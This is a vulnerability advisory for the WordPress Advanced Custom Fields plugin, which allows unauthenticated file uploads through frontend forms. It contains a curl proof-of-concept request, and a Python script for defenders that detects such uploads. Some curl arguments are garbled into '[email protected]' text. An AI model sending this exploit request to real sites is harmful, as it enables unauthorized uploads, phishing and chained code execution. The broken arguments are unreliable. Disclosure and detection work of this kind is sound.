wpvulndb | Pritect | WPVDB-ID:3FDE5336-552C-4861-8B4D-89A16735C0E2
Aug 01, 2022 - 12:00 a.m.

Advanced Custom Fields 5.0-5.12.2 - Unauthenticated File Upload

wpscan.com

EPSS: 0.002 (Low), percentile 60.2%

The plugin allows unauthenticated users to upload files if a frontend form is available. Only file types allowed in a default WP configuration are accepted, so PHP is not possible. This vulnerability was introduced in the 5.0 rewrite and did not exist prior to that release. Because WordPress does not allow uploading of .php files by default, the vulnerability is not easily wormable, but many other file types can be uploaded and then used with another exploit to execute code, or used in a phishing attack to get a user to download and execute a resource from a “trusted” site.

PoC

The nonce is retrieved from a form in the frontend:

    curl \
      -i -s -k -X 'POST' \
      -F "comment=Test comment" \
      -F '_acf_post_id=1' \
      -F '_acf_validation=1' \
      -F '_acf_nonce=ba2ef314e0' \
      -F '_acf_changed=0' \
      -F 'acf[field_62c8939d255d8]=Something' \
      -F 'author=testing' \
      -F '[email protected]' \
      -F 'url=' \
      -F 'submit=Post+Comment' \
      -F 'comment_post_ID=1' \
      -F 'comment_parent=0' \
      -F 'acf[name][email protected]' \
      'http://play.local/wp-comments-post.php'
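For defenders triaging captured requests, the sketch below flags anonymous multipart POSTs to wp-comments-post.php that carry a file part, which the stock WordPress comment form never sends. It is an added example, not code from the advisory or the plugin; the function names, the header dictionary layout and the sample request are constructed, and treating a wordpress_logged_in_ cookie as "authenticated" is an assumption.

```python
import email

# Constructed sample request body (not captured traffic); field names follow the
# acf[...] / _acf_nonce pattern shown in the advisory's PoC.
SAMPLE_CT = "multipart/form-data; boundary=XBOUND"
SAMPLE_BODY = (
    b"--XBOUND\r\n"
    b'Content-Disposition: form-data; name="comment"\r\n\r\n'
    b"Test comment\r\n"
    b"--XBOUND\r\n"
    b'Content-Disposition: form-data; name="_acf_nonce"\r\n\r\n'
    b"0000000000\r\n"
    b"--XBOUND\r\n"
    b'Content-Disposition: form-data; name="acf[field_example]"; filename="sample.txt"\r\n'
    b"Content-Type: text/plain\r\n\r\n"
    b"constructed file body\r\n"
    b"--XBOUND--\r\n"
)


def file_parts(content_type, body):
    """Return (field name, filename) for each multipart part that carries a file."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    if not msg.is_multipart():
        return []
    found = []
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        filename = part.get_filename()
        if filename:  # filename="" is an empty file input, not an upload
            found.append((name, filename))
    return found


def flag_request(method, path, headers, body):
    """Flag anonymous POSTs to the comment endpoint that include file parts."""
    if method.upper() != "POST":
        return []
    if not path.split("?", 1)[0].endswith("/wp-comments-post.php"):
        return []
    # Assumption: a wordpress_logged_in_* cookie marks an authenticated session.
    # Cookie presence is a triage heuristic only; it is not validated here.
    if "wordpress_logged_in_" in headers.get("Cookie", ""):
        return []
    return file_parts(headers.get("Content-Type", ""), body)


if __name__ == "__main__":
    print(flag_request("POST", "/wp-comments-post.php",
                       {"Content-Type": SAMPLE_CT}, SAMPLE_BODY))
```

Header names are assumed to arrive in canonical case ("Content-Type", "Cookie"); normalise them first if the capture source does not.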
